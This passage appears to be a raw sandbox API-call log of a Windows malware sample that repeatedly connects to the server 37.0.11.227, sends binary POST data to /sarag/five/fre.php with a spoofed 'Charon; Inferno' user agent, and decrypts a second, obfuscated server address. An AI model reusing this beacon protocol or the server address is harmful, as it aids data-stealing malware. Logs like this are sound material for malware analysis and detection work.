(lpLibFileName="shlwapi") returned 0x76ed0000 [0283.014] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0283.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.015] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0283.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.016] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0283.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.017] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0283.017] GetProcessHeap () returned 0x690000 [0283.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.030] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0283.030] GetProcessHeap () returned 0x690000 [0283.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0283.030] socket (af=2, type=1, protocol=6) returned 0x8e0 [0283.030] connect (s=0x8e0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0283.059] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0283.059] GetProcessHeap () returned 0x690000 [0283.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0283.059] GetProcessHeap () returned 0x690000 [0283.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0283.060] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.061] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.061] GetProcessHeap () returned 0x690000 [0283.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0283.061] GetProcessHeap () returned 0x690000 [0283.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.062] GetProcessHeap () returned 0x690000 [0283.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0283.062] GetProcessHeap () returned 0x690000 [0283.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0283.063] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.064] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.064] GetProcessHeap () returned 0x690000 [0283.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0283.064] GetProcessHeap () returned 0x690000 [0283.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.064] send (s=0x8e0, buf=0x6ad508*, len=242, flags=0) returned 242 [0283.064] send (s=0x8e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0283.065] GetProcessHeap () returned 0x690000 [0283.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0283.065] recv (in: s=0x8e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0283.134] GetProcessHeap () returned 0x690000 [0283.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0283.134] GetProcessHeap () returned 0x690000 [0283.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0283.135] GetProcessHeap () returned 0x690000 [0283.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0283.135] GetProcessHeap () returned 0x690000 [0283.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0283.135] closesocket (s=0x8e0) returned 0 [0283.136] GetProcessHeap () returned 0x690000 [0283.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0283.136] GetProcessHeap () returned 0x690000 [0283.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.137] GetProcessHeap () returned 0x690000 [0283.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0283.137] GetProcessHeap () returned 0x690000 [0283.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d8) returned 0x8e0 [0283.154] Sleep (dwMilliseconds=0xea60) [0283.155] GetProcessHeap () returned 0x690000 [0283.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0283.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0283.182] GetProcessHeap () returned 0x690000 [0283.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0283.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.184] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0283.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.185] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.186] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.186] GetProcessHeap () returned 0x690000 [0283.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0283.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.188] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0283.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.231] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0283.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.232] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0283.232] GetProcessHeap () returned 0x690000 [0283.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.233] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.234] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.235] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.236] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.236] GetProcessHeap () returned 0x690000 [0283.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.236] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.236] GetProcessHeap () returned 0x690000 [0283.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.237] GetProcessHeap () returned 0x690000 [0283.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.237] GetProcessHeap () returned 0x690000 [0283.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.237] GetProcessHeap () returned 0x690000 [0283.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0283.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0283.254] GetProcessHeap () returned 0x690000 [0283.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0283.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.255] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0283.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.256] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.257] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.257] GetProcessHeap () returned 0x690000 [0283.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0283.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.259] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0283.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.260] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0283.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.261] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0283.261] GetProcessHeap () returned 0x690000 [0283.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.262] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0283.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.263] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0283.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.264] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0283.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.265] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0283.265] GetProcessHeap () returned 0x690000 [0283.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.265] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0283.265] GetProcessHeap () returned 0x690000 [0283.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0283.265] socket (af=2, type=1, protocol=6) returned 0x8e4 [0283.266] connect (s=0x8e4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0283.291] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0283.291] GetProcessHeap () returned 0x690000 [0283.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0283.291] GetProcessHeap () returned 0x690000 [0283.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0283.291] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.292] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.292] GetProcessHeap () returned 0x690000 [0283.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0283.292] GetProcessHeap () returned 0x690000 [0283.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.293] GetProcessHeap () returned 0x690000 [0283.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0283.293] GetProcessHeap () returned 0x690000 [0283.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0283.294] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.297] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.297] GetProcessHeap () returned 0x690000 [0283.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0283.297] GetProcessHeap () returned 0x690000 [0283.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.298] send (s=0x8e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0283.298] send (s=0x8e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0283.298] GetProcessHeap () returned 0x690000 [0283.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0283.298] recv (in: s=0x8e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0283.374] GetProcessHeap () returned 0x690000 [0283.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0283.374] GetProcessHeap () returned 0x690000 [0283.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.374] GetProcessHeap () returned 0x690000 [0283.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0283.375] GetProcessHeap () returned 0x690000 [0283.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0283.375] closesocket (s=0x8e4) returned 0 [0283.375] GetProcessHeap () returned 0x690000 [0283.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0283.375] GetProcessHeap () returned 0x690000 [0283.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.376] GetProcessHeap () returned 0x690000 [0283.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0283.376] GetProcessHeap () returned 0x690000 [0283.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e0) returned 0x8e4 [0283.378] Sleep (dwMilliseconds=0xea60) [0283.380] GetProcessHeap () returned 0x690000 [0283.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0283.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0283.393] GetProcessHeap () returned 0x690000 [0283.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0283.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.394] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0283.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.395] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.395] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.395] GetProcessHeap () returned 0x690000 [0283.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0283.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.403] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0283.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.406] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0283.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.407] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0283.407] GetProcessHeap () returned 0x690000 [0283.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.411] GetProcessHeap () returned 0x690000 [0283.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0283.411] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.411] GetProcessHeap () returned 0x690000 [0283.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0283.411] GetProcessHeap () returned 0x690000 [0283.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.412] GetProcessHeap () returned 0x690000 [0283.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0283.412] GetProcessHeap () returned 0x690000 [0283.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0283.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.413] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0283.424] GetProcessHeap () returned 0x690000 [0283.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0283.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.425] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0283.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.427] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.428] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.428] GetProcessHeap () returned 0x690000 [0283.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0283.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.429] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0283.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.430] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0283.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.431] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0283.431] GetProcessHeap () returned 0x690000 [0283.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.432] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0283.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.433] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0283.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.434] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0283.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.435] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0283.435] GetProcessHeap () returned 0x690000 [0283.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0283.435] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 